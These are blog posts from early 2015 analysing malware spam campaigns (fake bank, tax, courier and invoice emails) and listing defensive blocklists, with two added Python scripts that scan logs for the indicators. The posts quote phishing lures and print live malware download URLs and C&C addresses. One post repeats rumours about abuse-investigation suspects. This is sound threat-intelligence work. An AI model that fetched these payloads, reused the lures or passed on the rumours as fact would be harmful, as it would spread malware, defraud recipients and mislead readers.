Registrant Phone Ext:
Registrant Fax: +7.
Registrant Fax Ext:
Registrant Email: jramil889@gmail.com
I don't know if this person actually exists or indeed has anything to do with this, all searches come up blank.
In addition to this, some of these domains use nameservers on the following IP addresses:
168.235.70.106
168.235.69.219
These are allocated to Ramnode LLC in the US. I would suggest that they are under the control of the bad guys and are worth blocking traffic to.
Note that Cyphort identifies these C&C servers for the malware:
asthalproperties.com:4444
pratikconsultancy.com:8080
The following IPs and domain names all seem to be connected and I would recommend blocking at least the IP addresses and domains in bold (the other domains look like they are probably throwaway ones):
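As an added example (not part of the original post or any tool it mentions), the following Python matcher applies a subset of the indicators recommended above to constructed connection-log lines. It handles the three indicator shapes the post uses: CIDR ranges such as 5.196.143.0/28, bare IPs such as 168.235.69.219, and the host:port C&C entries from Cyphort; the log format, the client IPs and the `Blocklist`/`scan_log` names are assumptions made here.

```python
import ipaddress

# Indicators copied from the post above (a subset, for the demonstration).
# A bare domain blocks every port; a host:port entry blocks only that port.
POST_BLOCKLIST = [
    "5.196.143.0/28",
    "5.196.141.24/29",
    "168.235.69.219",
    "168.235.70.106",
    "asthalproperties.com",
    "pratikconsultancy.com:8080",
]


class Blocklist:
    def __init__(self, entries=()):
        self.networks = []  # ip_network objects (bare IPs become /32)
        self.domains = {}   # domain -> None (any port) or set of ports
        for entry in entries:
            self.add(entry)

    def add(self, entry):
        entry = entry.strip().lower()
        try:
            self.networks.append(ipaddress.ip_network(entry, strict=False))
            return
        except ValueError:
            pass
        host, sep, port = entry.rpartition(":")
        if not sep:
            host, port = entry, ""
        try:  # an IP:port indicator is treated as a /32 block (port ignored)
            self.networks.append(ipaddress.ip_network(host))
            return
        except ValueError:
            pass
        if not port:
            self.domains[host] = None
        elif self.domains.get(host, set()) is not None:
            self.domains.setdefault(host, set()).add(int(port))

    def match(self, host, port=None):
        """Return the indicator covering host[:port], or None."""
        host = host.strip().lower().rstrip(".")
        try:
            addr = ipaddress.ip_address(host)
        except ValueError:
            addr = None
        if addr is not None:
            return next((str(n) for n in self.networks if addr in n), None)
        # Check the name and each parent domain, but never the bare TLD, so
        # www.asthalproperties.com is caught by the asthalproperties.com entry.
        labels = host.split(".")
        for i in range(len(labels) - 1):
            candidate = ".".join(labels[i:])
            if candidate not in self.domains:
                continue
            ports = self.domains[candidate]
            if ports is None:
                return candidate
            if port in ports:
                return f"{candidate}:{port}"
        return None


def scan_log(blocklist, lines):
    """Return (timestamp, client, destination, indicator) for matching lines.

    Constructed log format: '<timestamp> <client-ip> <dest-host>:<dest-port>'.
    """
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) != 3:
            continue  # skip malformed lines rather than crash the sweep
        ts, client, dest = parts
        host, sep, port = dest.rpartition(":")
        if not sep:
            host, port = dest, ""
        indicator = blocklist.match(host, int(port) if port else None)
        if indicator:
            hits.append((ts, client, dest, indicator))
    return hits


# Constructed sample log: four lines touch blocked indicators, the rest do not.
SAMPLE_LOG = """\
2015-02-12T10:00:01Z 10.0.0.5 www.example.org:443
2015-02-12T10:00:02Z 10.0.0.5 5.196.143.7:80
2015-02-12T10:00:03Z 10.0.0.9 ns1.example.net:53
2015-02-12T10:00:04Z 10.0.0.9 168.235.69.219:53
2015-02-12T10:00:05Z 10.0.0.7 pratikconsultancy.com:443
2015-02-12T10:00:06Z 10.0.0.7 pratikconsultancy.com:8080
2015-02-12T10:00:07Z 10.0.0.7 www.asthalproperties.com:80
2015-02-12T10:00:08Z 10.0.0.7 5.196.143.16:80
this line is malformed
"""


def demo_hits():
    return scan_log(Blocklist(POST_BLOCKLIST), SAMPLE_LOG.splitlines())
```

Note that 5.196.143.16 falls just outside the /28 and pratikconsultancy.com on port 443 is not flagged, because only the 8080 C&C port is listed for it; adding the bare domain would block every port.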
Labels: Cryptowall, Evil Network, Malware, OVH, Viruses
Thursday, 5 February 2015
Malware spam: "Unable to deliver your item, #000022074" / "FedEx 2Day A.M"
This fake FedEx spam has a malicious script attached.
From: FedEx 2Day A.M.
Date: 5 February 2015 at 15:01
Subject: PETRO, Unable to deliver your item, #0000220741
FedEx ®
Dear Petro,
We could not deliver your item.
You can review complete details of your order in the find attached.
Yours sincerely,
Marion Bacon,
Delivery Manager.
(C) 2014 FedEx. The content of this message is protected by copyright and trademark laws. All rights reserved.
Attached is a file FedEx_0000220741.zip which contains a malicious javascript which is highly obfuscated [pastebin] but it is a bit clearer when deobfuscated [pastebin]. This script has a moderate detection rate of 9/56, and downloads a file from:
http://freesmsmantra.com/document.php?id=5451565E140110160B0824140110160B08000D160107104A070B09&rnd=3252631
Which is saved as %TEMP%\11827407.exe. This has a low detection rate of 3/56. Automated analysis tools [1] [2] [3] don't give much of a clue as it has been hardened against analysis.
UPDATE: This tweet gives a bit more insight into the malware..
The malware dropped seems to be Boaxxe/miuref: ET TROJAN Miuref/Boaxxe Checkin {TCP} -> 91.231.87.90:80
So, I would definitely recommend blocking 91.231.87.90 and also the domain coldserv24.com which is hosted on that server and may be malicious.
Wednesday, 4 February 2015
Infographic: Operation Yewtree vs Operation Fernbridge arrests
Two broadly equivalent investigations into child abuse rings, Operation Yewtree and Operation Fernbridge have had very different outcomes.
Yewtree has seen arrests of several high-profile people involved in the media, the majority of whom have not been found guilty of anything. But the rumoured suspects in Fernbridge include politicians, civil servants, judges and leaders of industry as well as a pop star or two. Why are the current outcomes looking so different?
(an earlier version of this infographic was published in July 2014)
Labels: Crime, Infographic
Tuesday, 3 February 2015
Malware spam: "Circor [_CIG-EDI@circor.com]" / "CIT Inv# 15000375 for PO# SP14161"
This fake finance spam pretends to be from the wholly legitimate firm Circor, but it is not. Instead, it is a forgery with a malicious Word document attached.
From: Circor [_CIG-EDI@circor.com]
Date: 3 February 2015 at 09:56
Subject: CIT Inv# 15000375 for PO# SP14161
Please do not respond to this email address. For questions/inquires, please
contact our Accounts Receivable Department.
______________________________________________________________________
This email has been scanned by the MessageLabs outbound
Email Security System for CIRCOR International Inc.
For more information please visit http://www.symanteccloud.com
______________________________________________________________________
Don't be fooled by the email signature, the attachment is definitely nasty. So far I have only seen one version with a detection rate of 4/55, which contains a malicious macro [pastebin] that downloads a component from:
http://gloo.ng/js/bin.exe
..which is then saved as %TEMP%\\dsfsdf.exe. This has a VirusTotal detection rate of 3/48 (it is identified as a Dridex component). According to the Malwr report, this phones home to a couple of IPs that I haven't seen before:
143.107.17.183 (Universidade De Sao Paulo, Brazil)
92.63.88.108 (MWTV SIA, Latvia)
It also drops a DLL with a detection rate of 3/56.
Recommended blocklist:
143.107.17.183
92.63.88.108
Friday, 30 January 2015
Malware spam: "BACS Transfer : Remittance for.."
So far I have only seen one sample of this..
From "Garth Hutchison"
Date 21/01/2015 11:50
Subject BACS Transfer : Remittance for JSAG400GBP
We have arranged a BACS transfer to your bank for the following amount : 5821.00
Please find details attached.
Attached is a malicious Word document BACS_transfer_JS87123781237.doc [VT 1/57] which contains a macro [pastebin] which downloads a file from:
http://stylishseychelles.com/js/bin.exe
This is then saved as %TEMP%\iHGdsf.exe. This has a VirusTotal detection rate of 6/57 identifying it as a Dridex downloader. You can see the Malwr report here.
Sources indicate that this malware phones home to the following IPs which I recommend you block:
92.63.88.108
143.107.17.183
5.39.99.18
136.243.237.218
Tuesday, 27 January 2015
Malware spam: "Eileen Meade" / "R. Kern Engineering & Mfg Corp."
Kern Engineering & Mfg Corp. is a wholly legitimate firm, they are not sending out this spam nor have their systems been compromised in any way. Instead, this is a forgery which has a malicious Word document attached.
From: Eileen Meade [eileenmeade@kerneng.com]
date: 27 January 2015 at 08:25
subject: inv.# 35261
Here is your invoice & Credit Card Receipt.
Eileen Meade
R. Kern Engineering & Mfg Corp.
Accounting
909) 664-2442
Fax 909) 664-2116
So far, I have seen two different versions of the Word document, both poorly detected [1] [2] containing two different macros [1] [2]. These attempt to download a binary from one of the following locations:
http://UKR-TECHTRAININGDOMAIN.COM/js/bin.exe
http://schreinerei-ismer.homepage.t-online.de/js/bin.exe
This is saved as %TEMP%\sdfsdferfwe.exe. It has a VirusTotal detection rate of 3/57. Automated analysis tools are inconclusive [1] [2] [3].
Monday, 26 January 2015
Very lazy Walmart raffle ticket scam spam
Sometimes I see some very sophisticated scams with lovely websites and a credible and convincing pitch to snare the unwary. This isn't one of those, but it is a remarkably lazy piece of crap instead.
From: Walmart [clarkscott75875@gmail.com]
Reply-To: mrwilliamm234@gmail.com
Date: 26 January 2015 at 17:23
Subject: Walmart
Walmart,
This is to announce to the Public that the Wal-Mart Stores, Inc., have
started selling raffle ticket for the 2015 with the effect from today
been 1/26/2015, for more inquiries, contact our Publicity Department
below:
Wal-Mart Public Department
E-mail: publicityonwalmart@publicist.com
or
Mr. William Morgan
E-mail: mrwilliamm234@gmail.com
You will be directed on what to do to pick your form
Thanking you In Advance
Dennis Harrison
Walmart, Arkansas USA
I've heard it said that the scammers deliberately choose really stupid scams that only an idiot would fall for.. in order to filter out all those people who aren't idiots. So perhaps there is a point to all this half-arsed crappiness after all.
Malware spam: "CardsOnLine@natwesti.com" / "Cards OnLine E-Statement E-Mail Notification"
This fake NatWest email leads to malware:
From: CardsOnLine [CardsOnLine@natwesti.com]
Date: 26 January 2015 at 13:06
Subject: Cards OnLine E-Statement E-Mail Notification
Body:
Dear Customer
Your July 30, 2014 E-Statement for account number xxxxxxxxxxxx6956 from Cards OnLine is now available.
For more information please check link: http://afreshperspective.com/NATWEST_BANK-MESSAGES-STORAGE/new.secured_document.html
Thank you
Cards OnLine
Many internet users have recently been targeted through bogus E-Mails by fraudsters claiming to be from their bank. These E-Mails ask customers to provide their internet banking security details in order to reactivate their account or verify an E-Mail address.
Please be on your guard against E-Mails that request any of your security details. If you receive an e-mail like this you must not respond.
Please remember that, for security reasons, apart from when you create them at registration or when you change your Internet Pin or Password, we will only ever ask you to enter random characters from your Internet PIN and Password when you logon to this service.
You must keep your security details secret. We would never ask you, by E-Mail, to enter (or record) these details in full and you must not respond to E-Mails asking for this information.
National Westminster Bank Plc, Registered in England No 929027. Registered
Office: 135 Bishopsgate, London EC2M 3UR. Authorised and regulated by the Financial Services Authority.
This E-Mail message is confidential and for use by the addressee only. If the message is received by anyone other than the addressee, please return the message to the sender by replying to it and then delete the message from your computer. Internet E-Mails are not necessarily secure. National Westminster Bank Plc does not accept responsibility for changes made to this message after it was sent.
Whilst all reasonable care has been taken to avoid the transmission of viruses, it is the responsibility of the recipient to ensure that the onward transmission, opening or use of this message and any attachments will not adversely affect its systems or data. No responsibility is accepted by National Westminster Bank Plc in this regard and the recipient should carry out such virus and other checks as it considers appropriate.
Users who click the link see a download page similar to this:
The link in the email downloads a randomly-named file in the format security_notice55838.zip which contains a malicious binary which will have a name similar to security_notice18074.exe.
This binary has a VirusTotal detection rate of 1/56 and is identified by Norman AV as Upatre. Automated analysis tools are not particularly enlightening [1] [2].
Malware spam: "HP Digital Device" / "Scanned Image"
From: HP Digital Device [HP_Printer@victimdomain.com]
Date: 26 January 2015 at 13:04
Subject: Scanned Image
Please open the attached document.
This document was digitally sent to you using an HP Digital Sending device.
-------------------------------------------------------------------------------
This email has been scanned for viruses and spam.
-------------------------------------------------------------------------------
Attached is a file ScannedImage.zip which contains a malicious executable ScannedImage.scr which has a VirusTotal detection rate of 5/56, you can see various automated analyses here: [1] [2] [3]
Labels: EXE-in-ZIP, Malware, Spam, Viruses
Malware spam: "Berendsen UK Ltd Invoice 60020918 117" / "donotreply@berendsen.co.uk"
UPDATE: a new spam run using this firm's name is active as of 24th February. For more information click here.
Berendsen is a wholly legitimate firm in the textiles and laundry business. They are not sending out this spam, nor have their systems been compromised in any way. Instead, this email is a forgery with a malicious Word document attached.
From: donotreply@berendsen.co.uk
Date: 26 January 2015 at 06:43
Subject: Berendsen UK Ltd Invoice 60020918 117
Dear Sir/Madam,
Please find attached your invoice dated 1st January.
All queries should be directed to your branch that provides the service. This detail can be found on your invoice.
Thank you.
___________________________________________________________
This e-mail and any attachments it may contain is confidential and
intended for the use of the named addressee(s) only. If you are not
the intended recipient, you have received it in error, please
immediately contact the sender and delete the material from your
computer system. You must not copy, print, use or disclose its
contents to any person. All e-mails are monitored for traffic data and
the content for security purposes.
Berendsen UK Ltd, part of the Berendsen plc Group.
Registered Office: 4 Grosvenor Place, London, SW1X 7DL.
Registered in England No. 228604
Attached is a malicious Word document with a zero detection rate which contains a malicious macro [pastebin], and this in turn downloads a binary from:
http://elektromarket.cba.pl/js/bin.exe
This executable is saved as %TEMP%\LAVUBDAJLCD.exe and has a VirusTotal detection rate of 2/57 (Norman AV identified it as Dridex).
Automated analysis [1] [2] [3] [4] is proving difficult; a contact suggests that Botnet 125 (which is behind this spam run) is having stability problems. Shame.
Friday, 23 January 2015
Malware spam: "You have received a new secure message from BankLine"
For some reason these RBS BankLine spam messages are a popular mechanism for the bad guys to spread malware.
From: Bankline [secure.message@rbs.com.uk]
Date: 23 January 2015 at 12:43
Subject: You have received a new secure message from BankLine
You have received a secure message.
Read your secure message by following the link bellow:
http://donumyok.com/RBS-DATA.STORAGE/personal.document.html
----------------
You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.
If you have concerns about the validity of this message, please contact the sender directly.
For questions please contact the Bankline Bank Secure Email Help Desk at 0131 556 3513.
The link in the email seems to be somewhat dynamic, as I have also seen this slightly different variant:
http://donumyok.com/RBS_BANK-ONLINE_SECURE_STORAGE/receive.personal-document.html
The landing page looks like this:
The link on that landing page goes to http://animation-1.com/js/jquery-1.41.15.js?get_message which downloads a ZIP file called Bankline_document_pdf71274.zip (or something similar) containing an executable file named something like Bankline_document_pdf24372.exe. The numbers change in each case, and indeed the executable changes slightly every time it is downloaded.
The ThreatExpert report shows that it attempts to communicate with the well-known-bad IP of 202.153.35.133 (Excell Media Pvt Ltd, India) which is associated with the Dyre banking trojan.
Malware spam: "IRS Fiscal Activity 531065" / "support@irsuk.co"
This fake IRS spam actually does use the irsuk.co domain to host malware.
From: IRS [support@irsuk.co]
Date: 23 January 2015 at 11:46
Subject: IRS Fiscal Activity 531065
Hello, [redacted].
We notify you that last year, according to the estimates of tax taxation,
we had a shortage of means.
We ask you to install the special program with new digital certificates,
what to eliminate an error.
To install the program go to the link above:
http://irsuk.co/DownloadIRSService/SetupIRS2015.zip
Thanks
Intrenal Revenue Sevrice
London W1K 6AH
United Kingdom
The ZIP file contains a malicious executable SetupIRS2015.exe which has a VirusTotal detection rate of 8/53. The irsuk.co site is hosted on 89.108.88.9 (Agava Ltd, Russia). The Malwr report shows it phoning home to garbux.com (78.24.219.6 - TheFirst-RU, Russia).
The WHOIS details for the domain are almost definitely fake, but kind of interesting..
Registrant ID: CR185450554
Registrant Name: Thomas McCaffrey
Registrant Organization: Real Help Communications, Inc.
Registrant Address1: 3023 Anzac Avenue
Registrant City: Roslyn
Registrant State/Province: Pennsylvania
Registrant Postal Code: 19001
Registrant Country: United States
Registrant Country Code: US
Registrant Phone Number: +1.2158872818
Registrant Email: tom@realhelp.net
They're interesting because these really are the valid contact details for Real Help Communications, Inc, which makes me wonder if their domain account at GoDaddy has been compromised.
A look at 89.108.88.9 shows there is only one active website on that IP address (irsuk.co), but the host on the IP identifies itself as ukirsgov.com, a domain created on the same day (2015-01-19) that has been suspended due to invalid WHOIS details (somebody at csc.com) and was hosted on a Bosnian IP of 109.105.193.99 (Team Consulting d.o.o.). That IP is identified as malicious by VirusTotal with a number of bad domains and binaries.
The malware POSTS to garbux.com which Sophos identifies as a characteristic of the generically-named Troj/Agent-ALHF.
Overall, automated analysis tools are not very clear about what this malware does [1] [2] [3] [4] [5] although you can guarantee it is nothing good.
Recommended blocklist:
89.108.88.9
78.24.219.6
109.105.193.99
irsuk.co
garbux.com
ukirsgov.com
updateimage.ru
getimgdcenter.ru
agensiaentrate.it
freeimagehost.ru
Malware spam: "2014 Tax payment issue" / "Your tax return was incorrectly filled out"
This tax-themed spam has a malicious Word document attached. It appears to come in several variants, for example:
From: Quinton
Date: 23 January 2015 at 08:18
Subject: 2014 Tax payment issue
According to your tax payments for 2014 year period we found that you gave a wrong legal address in your last tax payment. In order to avoid penalty fees on your tax dues we ask you to contact our specialist having checked the previous payment in advance (the DOC invoice attached below).
Regards
Quinton
Tax Inspector
-----------------
From: Tara Morris
Date: 23 January 2015 at 09:28
Subject: Your tax return was incorrectly filled out
Attention: Accountant
This is to inform you that your legal address was filled incorrectly while completing the last tax form application for 2014 year.
In order to avoid penalty fees during the next tax period please contact our expert as soon as you check the payment details (the DOC invoice attached below).
Attached is a Word document with a random name, but always starting with "TAX_". Examples include:
TAX_42592OE.doc
TAX_381694AI.doc
TAX_59582FZ.doc
There are two different variants of this Word document that I have seen so far, neither of which is detected by AV vendors [1] [2], containing one of two malicious macros [1] [2] that download a file 20.exe from the following URLs:
http://37.139.47.221:8080/koh/mui.php
http://95.163.121.82:8080/koh/mui.php
This file is then saved to %TEMP%\GYHjksdf.exe and has a low detection rate of 2/56 (Norman AV identifies it as Dridex). The Malwr analysis is inconclusive, other analysis is pending.
Thursday, 22 January 2015
Yet more MyFax malware spam
There's another batch of "MyFax" spam going around at the moment, for example:
From: MyFax [no-replay@my-fax.com]
Date: 22 January 2015 at 15:08
Subject: Fax #4356342
Fax message
http://[redacted]/.-NEW_RECEIVED.FAX/fax.html
Sent date: Thu, 22 Jan 2015 15:08:30 +0000
Clicking the link leads to a page like this:
The download leads to an EXE-in-ZIP download which is a little different every time [1] [2] [3] [virustotal]. Detection rates are around 6/55.
The Malwr report shows communication with the following URLs:
http://202.153.35.133:51025/2201us22/HOME/0/51-SP3/0/
http://202.153.35.133:51025/2201us22/HOME/1/0/0/
http://when-to-change-oil.com/mandoc/story_su22.pdf
http://202.153.35.133:51014/2201us22/HOME/41/7/4/
Of these 202.153.35.133 is the essential one to block traffic to, belonging to Excell Media Pvt Ltd in India. A file axybT95.exe is also dropped according to the report, which has a detection rate of 7/48.
I haven't seen a huge number of these; the format of the URLs looks something like this:
http://[redacted]/.-NEW_RECEIVED.FAX/fax.html
http://[redacted]/NEW_FAX-MESSAGES/fax.letter.html
http://[redacted]/_~NEW.FAX.MESSAGES/incoming.html
Wednesday, 21 January 2015
"Hartford Tech Summit" aka BizSummits: What's wrong with this picture? (hartfordsummit.com / hartfordsummit.org)
Last year I called out serial spammers BizSummits for their use of stolen photographs that they were attempting to pass off as activities at one of those summits.
A comment on one of the posts indicates that BizSummits are suffering from a degree of butthurt because of this.
Hi Conrad, we just received an autonotice about the comment from Claire Le and were again hoping you would consider archiving/mothballing it because readers see the misleading title which is why the commenter incorrectly surmised BizSummits is a fake after reading it. I think you know it is not, we are glad to immediately make you a member of one of the groups if wished so you can login and watch/listen to hundreds of past meetings (impossible if it were really a fake), and we are also glad to cover your airfare from the UK if you wish to attend any of the in-person events (next on the schedule is the HartfordSummit.com in a few weeks and then a series in Chicago in April including a CIO roundtable you might have interest in attending). Thank you for your consideration.
HartfordSummit.com? That's a new one on me. Let's head over to that website.
If you read my previous post on these folks, you might guess where this is going.
Now, bearing in mind the cringing embarrassment they must have felt when I pointed out that all the photos on their sites were of something else entirely, you would expect that they'd use a genuine photograph of one of their summits. I mean, everyone has a digital camera, right? It would be hard to avoid taking a photograph of one of these summits. And they have so many of them.
Let's have a closer look at that photo (http://loadurl.org/hartfordsummit/images/whatsnew.jpg)
It certainly looks like a seminar or summit. But let's see what a Google Reverse Image Search says..
It guesses that this is a picture of "business seminars" and reveals that the same photo is in use on many different sites. And in fact, you just need to do a Google image search for "Seminars" and it turns up in a prominent position.
So now we need some detective work, the original image doesn't appear to be online but I can find a slightly higher resolution one.
There's an interesting sign on the wall..
"The Ivy Review" it says. That matches pretty closely with a photo from ivycenters.com which has a very similar photograph.
This photograph was taken in the Santa Clara Convention centre. That's about 3000 miles from Hartford, but that's not really the point. The point is that this appears to be the photograph of a completely different convention from a completely different organisation. It is certainly a commonly used picture for "seminars" that people paste in when they haven't actually got a picture.
In fact, I have never seen a verifiable photo of any BizSummits event. Perhaps I am looking in the wrong place. Perhaps someone needs to buy BizSummits a digital camera. Draw your own conclusions.
As for a free trip to Connecticut to see BizSummits in action. Yeah, I think I'll pass on that offer.
Labels: BizSummits
Tuesday, 20 January 2015
Malware spam: "Barclays - Important Update, read carefully!" / "Barclays Online Bank [security-update@barclays.com]"
From: Barclays Online Bank [security-update@barclays.com]
Date: 20 January 2015 at 14:41
Subject: Barclays - Important Update, read carefully!
Dear Customer,
Protecting the privacy of your online banking access and personal information are our primary concern.
During the last complains because of online fraud we were forced to upgrade our security measures.
We believe that Invention of security measures is the best way to beat online fraud.
Barclays Bank have employed some industrial leading models to start performing an extra security check with Your Online Banking Activities to ensure a safe and secure Online and Mobile Banking.
For security reasons we downloaded the Update Form to security Barclays webserver.
You are requested to follow the provided steps and Update Your Online Banking details, for the safety of Your Accounts.
- Please download and complete the form with the requested details: http://fizza.ro/BARCLAYS~ONLINE.BANKING~UPDATE/update.html
- Fill in all required fields with your accurately details (otherwise will lead to service suspension)
Warning: If you choose to ignore our request, you leave us no choice but to temporary hold on your funds.
Thank you for your patience as we work together to protect your account.
Please update your records on or before 48 hours, a failure to update your records will result in a temporary hold on your funds.
Sincerely,
Barclays Online Bank Customer Service
We apologize for any inconvenience this may have caused.
(c) Copyright 2015 Barclays Bank Plc. All rights reserved.
The link in the email varies; some other examples seen are:
http://nrjchat.org/ONLINE~IMPORTANT-UPDATE/last-update.html
http://utokatalin.ro/ONLINE-BANKING_IMPORTANT/update.html
http://cab.gov.ph/ONLINE-IMPORTANT~UPDATE/last~update.html
Visiting these sites goes through some JavaScript hoops and then leads to a ZIP file download containing a malicious EXE that changes every time it is downloaded. The files are named in the general format update12345.zip and update54321.exe.
The file itself is an Upatre downloader, with poor detection rates [1] [2] [3].
The Malwr report shows traffic to the following URLs:
http://202.153.35.133:33384/2001uk11/HOME/0/51-SP3/0/
http://202.153.35.133:33384/2001uk11/HOME/1/0/0/
http://clicherfort.com/mandoc/eula012.pdf
http://202.153.35.133:33387/2001uk11/HOME/41/7/4/
http://essextwp.org/mandoc/ml1from1.tar
Out of these, 202.153.35.133 (Excell Media Pvt Ltd, India) is one you should definitely block. This downloader drops several files including (in this case) %TEMP%\sJFcN24.exe, which has a VirusTotal detection rate of just 3/57 and is identified as Dyreza.C by Norman anti-virus.
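As an added example (not code from the original post), here is a small Python script that turns the indicators listed above (the phishing landing pages, the Malwr-report URLs, the 202.153.35.133 host and the rotating updateNNNNN.zip/exe file names) into a check that can be run over proxy logs. The log lines embedded in it are constructed for illustration, not real traffic, and the log format ("timestamp client method url status") is an assumption; adapt the field split to whatever your proxy actually writes.

```python
"""Match the indicators from the Barclays/Upatre post against proxy log lines.

Added example, not part of the original post. The SAMPLE_LOG lines are
constructed; the indicator URLs are the ones quoted in the post.
"""
import re
from urllib.parse import urlparse

# Phishing landing pages named in the post.
PHISH_URLS = [
    "http://fizza.ro/BARCLAYS~ONLINE.BANKING~UPDATE/update.html",
    "http://nrjchat.org/ONLINE~IMPORTANT-UPDATE/last-update.html",
    "http://utokatalin.ro/ONLINE-BANKING_IMPORTANT/update.html",
    "http://cab.gov.ph/ONLINE-IMPORTANT~UPDATE/last~update.html",
]

# Traffic from the Malwr report quoted in the post.
C2_URLS = [
    "http://202.153.35.133:33384/2001uk11/HOME/0/51-SP3/0/",
    "http://202.153.35.133:33384/2001uk11/HOME/1/0/0/",
    "http://clicherfort.com/mandoc/eula012.pdf",
    "http://202.153.35.133:33387/2001uk11/HOME/41/7/4/",
    "http://essextwp.org/mandoc/ml1from1.tar",
]

# Hostnames to block, derived from the URLs above (port stripped).
BLOCK_HOSTS = {urlparse(u).hostname for u in PHISH_URLS + C2_URLS}

# Generic patterns for the parts of the campaign that vary:
# the Upatre check-in path prefix and the update12345.zip / update54321.exe names.
UPATRE_PATH = re.compile(r"^/2001uk11/HOME/")
PAYLOAD_NAME = re.compile(r"/update\d+\.(zip|exe)$", re.IGNORECASE)

# Constructed proxy log lines (assumed format: "<time> <client> <method> <url> <status>").
SAMPLE_LOG = """\
1421764800.123 10.0.0.12 GET http://fizza.ro/BARCLAYS~ONLINE.BANKING~UPDATE/update.html 200
1421764805.456 10.0.0.12 GET http://fizza.ro/BARCLAYS~ONLINE.BANKING~UPDATE/update73210.zip 200
1421764820.001 10.0.0.12 GET http://202.153.35.133:33384/2001uk11/HOME/0/51-SP3/0/ 200
1421764821.778 10.0.0.12 GET http://clicherfort.com/mandoc/eula012.pdf 200
1421764900.000 10.0.0.44 GET http://example.com/index.html 200
1421764901.000 10.0.0.44 GET http://example.com/software/update.html 200
"""


def classify(url):
    """Return the list of reasons a URL matches the campaign indicators (empty if clean)."""
    parsed = urlparse(url)
    host = parsed.hostname or ""
    reasons = []
    if host in BLOCK_HOSTS:
        reasons.append("blocked-host:" + host)
    if UPATRE_PATH.match(parsed.path):
        reasons.append("upatre-checkin-path")
    if PAYLOAD_NAME.search(parsed.path):
        reasons.append("rotating-payload-name")
    return reasons


def scan_log(text):
    """Parse log lines in the assumed format and return (client, url, reasons) for each hit."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue  # skip blank or malformed lines rather than crash on them
        _ts, client, _method, url, _status = fields[:5]
        reasons = classify(url)
        if reasons:
            hits.append((client, url, reasons))
    return hits


if __name__ == "__main__":
    for client, url, reasons in scan_log(SAMPLE_LOG):
        print(client, url, ", ".join(reasons))
```

Running the script on the constructed sample flags the four requests from 10.0.0.12 and leaves the two example.com requests alone; the plain `update.html` on example.com does not match because the payload-name pattern requires the numeric suffix the post describes. The host set is the part worth feeding into a proxy or DNS blocklist; the path patterns are there to catch the same downloader behind a host that is not yet on the list.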